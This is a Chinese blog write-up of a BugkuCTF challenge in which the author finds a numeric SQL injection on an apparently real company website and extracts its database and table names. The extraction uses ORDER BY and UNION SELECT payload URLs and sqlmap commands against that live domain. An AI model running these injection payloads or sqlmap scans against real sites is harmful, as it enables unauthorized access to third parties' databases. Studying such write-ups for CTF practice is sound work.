BugkuCTF-web进阶-实战2-注入 writeup

最新推荐文章于 2022-05-17 21:10:50 发布
最新推荐文章于 2022-05-17 21:10:50 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: CTF做题记录
会下雪的晴天
本文链接:https://blog.csdn.net/weixin_43578492/article/details/95858683
版权

题目描述

解题思路

在这里插入图片描述
打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始
在这里插入图片描述
注入嘛,老套路,两种方法

  • 法一、手工注入
    猜字段http://www.kabelindo.co.id/readnews.php?id=28 order by 5正常
    在这里插入图片描述
    http://www.kabelindo.co.id/readnews.php?id=28 order by 6
    报错,字段为5
    在这里插入图片描述
    看字段回显(记得把id置为无用数值,不然会掩盖后面的查询结果)
    http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,2,3,4,5
    在这里插入图片描述
    暴数据库http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,database(),3,4,5
    得到数据库u9897uwx_kabel
    在这里插入图片描述
    暴表名http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
    在这里插入图片描述
    这个表太多了,没法全部显示,我们只需要查看源码即可,表在‘3’的前面
    在这里插入图片描述
  • 法二、sqlmap
    可以抓包,salmap扫描包,也可以直接扫描网站,都可以,这里我就扫描网站吧,懒得抓包,存txt了
    暴数据库sqlmap.py -u www.kabelindo.co.id/readnews.php?id=28 --dbs
    –dbs(两个-) -->查询当前数据库
    得到数据库u9897uwx_kabel
    在这里插入图片描述
    暴表名sqlmap.py -u www.kabelindo.co.id/readnews.php?id=28 -D u9897uwx_kabel --tables
    -D -->指定数据库
    –tables(两个-) -->查询当前数据库的表名
    得到最后一个表名tbnomax
    在这里插入图片描述

得到FLAG

flag{tbnomax}

END

会下雪的晴天
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu Web(21-25)
kid的博客
06-06 1932
BugKu Web(21-25) 前言 bugku刷题,本来想每10道写一篇的,但水平有限,发现到这里题目难度已经有点大了,所以每5道题整合一篇吧… 题目 秋名山老司机 登陆可以看到如上提示,然后快速刷新可以看到要求是post提交,键名为value 这肯定是人工没法完成的,必须写脚本 py脚本写起来的时候,没有用过eval函数,是真的痛苦,不断字符串处理,条件判断… 最后还不对,最后看...
bugku web进阶。。buuctf web
gudugeji的博客
01-17 432
1 phpcmsv9 御剑扫描,访问.txt的网址,发现flag 2
BUGKU web进阶1
weixin_45689999的博客
02-22 206
phpcmsV9 提示说在txt里,御剑扫描后台 发现txt,双击得到flag
BUGKU(WEB进阶)-phpcmsV9
tothemoon的博客
11-16 379
拿到一个题目后最基本的:查看网站里面有没有其他页面。 比如查看flag.txt,robots.txt,index.php.bak。 这道题查看robots.txt就可以直接看到flag了。 提交了一下居然是对的。 可能这道题已经被大佬们玩坏了吧,不知到正确的做法是怎样的。 ...
CTFHub数据库注入WriteUP
tangshuangsss的专栏
06-23 383
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介CTFHub 为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。「赛事中心」提供全网...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
ctf-writeup-crawler:CTF撰写的检索器
04-27
ctf-writeup-crawler CTF撰写的检索器 请确保已在配置了以下内容的计算机上安装并运行PostgreSQL 确保有一个名为ctfcrawler的数据库 确保有一个postgres用户/密码:ctfcrawler / ctfcrawler 该程序是在Eclipse ...
ifa-ctf-writeup
03-17
ifa-ctf-writeup
代码审计:bugkuCTF web进阶 bugku导航两处注入
qq_43233085的博客
04-01 841
代码审计:bugkuCTF web进阶 bugku导航两处注入bugku导航代码审计/member/add.php 存在注入/member/admin.php 存在注入 bugku导航 bugku导航是bugkuCTF靶场中,web进阶的一道题,存在源码泄露,所以下下来审计一波。 https://ctf.bugku.com/challenges 下载源码 http://123.206.87.2...
bugku-实战2-注入
偷一个月亮
06-29 317
news存在注入点,4个字段 select tables 发现表太多了,显示不全 这时用字符截断函数 get flag
Bugku web进阶 实战2-注入
qq_33567663的博客
11-13 709
访问网址一一查看所链接,发现About-news存在可能注入的点,http://www.kabelindo.co.id/readnews.php?id=25 burp抓包另存为txt文件,sqlmap爆破 获取flag    ...
【SQL注入CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3434
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
BugKu Web进阶
AlexYoung28的博客
08-25 2122
哇,总算做到进阶题目来了,希望我这个菜鸡还可以多做几道题吧!加油 phpcmsV9 看到这个题目,看起来是一个已经存在的漏洞,赶快搜一搜,结果,还真有这个漏洞,然后大致看了一下。 但是这个网页是不是太简陋了,感觉没有什么注入点呀。 好吧,还是 扫描器扫一扫。 结果发现了 robots.txt, 看一下,结果就没有结果了。 当然,这里好像是因为这道题靶机被人破坏了吧,我进入这道题的主页...
BugKu Web WP
AlexYoung28的博客
08-23 534
变量1 这道题要好好说一下,因为以前不太知道这个套路。 我们来看看源码: 这个代码最重要的两部分:一是 正则匹配,对我们输入的进行检查。  二是  var_dump($$args)  这句代码。 我们可以想到 如果我们的 $args 的值 刚好是 这个php代码中的一个变量名称,那么我们 是不是就可以通过 $$args  将这个变量打印出来了。例如: 那么接下来,我们就该想到,我...
CTF学习之路---bugku WEB篇-WEB2(更新中)
踏坑的小白
01-03 1451
1.WEB2 题目链接 http://123.206.87.240:8002/web2/ 第一题为签到题,页面挺好玩,主要进入有一组滑稽笑脸 使用F12查看源代码即可找到flag值 签到题没什么好说的 ...
bugku(web进阶 wp)
Xi4or0uji
09-02 2534
phpcmsv9 这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了....... 不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的....... 正确的解法应该是找到注册页面 填写了以后在post数据最后加一句&info[content]=<img src=http://www.bugku.com/tools/phpyi...
BugKuCTF_WEB题解报告
whatacutepanda的博客
03-19 5692
在学习CTF中,写点东西记录自己的学习,也算是一个反思吧。http://ctf.bugku.com/challenges                                                   web2:这个只用简单的按F12就能看到文件上传测试:我们首先随便传入一个PHP文件尝试一下发现提示说非图片文件那么我们再尝试传入一个图片然后我们思考一下题目要求说上传一个PHP...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值